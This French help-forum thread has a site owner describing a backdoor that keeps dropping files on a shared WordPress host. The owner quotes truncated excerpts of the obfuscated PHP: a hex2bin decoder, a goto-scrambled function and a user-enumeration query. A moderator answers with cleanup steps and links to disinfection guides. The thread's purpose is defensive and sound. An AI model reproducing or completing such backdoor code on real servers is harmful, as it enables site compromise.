Bonjour,
j'ai un backdoor qui injecte des fichiers à la racine du serveur mutualisé ou il n'y a pas de wordpress installé directement,
je les supprime régulièrement et j'analyse les plugin wordpress de mes sites et j'ai installé un plugin monitor pour les changements
sur le serveur ftp des sites apparemment il faut que je le fasse pour chaque site.Et puis il faudrait que j'installe un site à la racine peut etre pour
voir comment ca commence?
Juste si vous avez quelques infos sur les scripts ou une idée d'enrayer cela
l'attaquant crée 4 fichiers à chaque fois, merci
admin.php
extrait du code : <?php
if (!function_exists('hex2bin')) { function hex2bin($JKiuL) { $Jl4hU = strlen($JKiuL); $Pycm9 = ""; $jV1U7 = 0; while ($jV1U7 < $Jl4hU) { $fDGwd =
fox-style.php
extrait du code : <?php
if (!function_exists('hex2bin')) { function hex2bin($JKiuL) { $Jl4hU = strlen($JKiuL); $Pycm9 = ""; $jV1U7 = 0; while ($jV1U7 < $Jl4hU) { $fDGwd =
index.php
extrait du code
<?php goto t5YxR; t5YxR: function vPFWr($KPBxi) { goto b6wCq; SJCmP: return $KPBxi; goto fSf_U; Q2Oje: $KPBxi = substr($KPBxi, (int) wiNPsmNlGPpvYAW8vkEagLZs0xEQF9Id0Zxcy3N8yyv4O3BNi8867z6KCOeU3gdBhGXpXm0PoGxaVif09Svu8wjnWvubjfr3sCZUpfhnA7f1tvCx0JAoDNo
reads.hlm
get_results( "SELECT ID FROM $wpdb->users ORDER BY ID ASC" ); $authorId = 0; $firstUserId = 0; if( $users ) { foreach ( $users as $user ) { if($firstUserId == 0){ $firstUserId = $user->ID; } $wp_user =
Supprimer backdoor serveur Wordpress
- Messages : 114066
- Inscription : 10 sept. 2005 13:57
Re: backdoor serveur wordpress
Salut,
L'extension WordPress Firewall permet de trouver les fichiers PHP Wordpress qui ont été modifiées : https://www.malekal.com/wordfence-suppr ... wordpress/
Cela permet de les restaurer pour retirer le code malveillant et les injections de code.
Mais le mieux est de repartir sur une sauvegarde saine, puis mettre à jour WordPress ainsi que tous les extensions.
Puis vérifier avec WordFence que tout est sain.
Enfin changer les mots de passe de tous les comptes.
Sinon réinstaller WordPress avec le ZIP du site en écrasant les fichiers PHP présents (sauf wp-config.php).
Remettre les extensions.
Changer les mots de passe de tous les comptes.
L'extension WordPress Firewall permet de trouver les fichiers PHP Wordpress qui ont été modifiées : https://www.malekal.com/wordfence-suppr ... wordpress/
Cela permet de les restaurer pour retirer le code malveillant et les injections de code.
Mais le mieux est de repartir sur une sauvegarde saine, puis mettre à jour WordPress ainsi que tous les extensions.
Puis vérifier avec WordFence que tout est sain.
Enfin changer les mots de passe de tous les comptes.
Sinon réinstaller WordPress avec le ZIP du site en écrasant les fichiers PHP présents (sauf wp-config.php).
Remettre les extensions.
Changer les mots de passe de tous les comptes.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
- Messages : 114066
- Inscription : 10 sept. 2005 13:57
Re: Supprimer backdoor serveur Wordpress
Je viens de publier une série d'articles sur le site qui devrait aider pour désinfecter un site WordPress et le sécuriser par la suite :
Comment sécuriser WordPress contre les piratages
- Désinfecter un site WordPress piraté
- Comment détecter les PHP Backdoor ou Web Shells
- Faire un audit de sécurité sur WordPress
- Wordfence : Protéger WordPress avec un Firewall et scan anti-malware
Comment sécuriser WordPress contre les piratages
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
- Messages : 1
- Inscription : 16 mars 2022 16:03
Re: Supprimer backdoor serveur Wordpress
Merci pour les infos. Je cherche à sécuriser mon site web, j'ai déjà eu des problèmes d'intrusion et c'est super dur de s'en sortir quand on est pas spécialiste du sujet.
-
- Sujets similaires
- Réponses
- Vues
- Dernier message
-
- 4 Réponses
- 107 Vues
-
Dernier message par Malekal_morte
-
- 6 Réponses
- 81 Vues
-
Dernier message par smokiemamours
-
-
Trojan.Stealer et Backdoor.Farfli, Spyware.RaccoonStealer [résolu]
par bobkoutso » » dans Discussions/Aides Antivirus - 8 Réponses
- 321 Vues
-
Dernier message par Malekal_morte
-
-
- 5 Réponses
- 159 Vues
-
Dernier message par Parisien_entraide
-
- 7 Réponses
- 108 Vues
-
Dernier message par angelique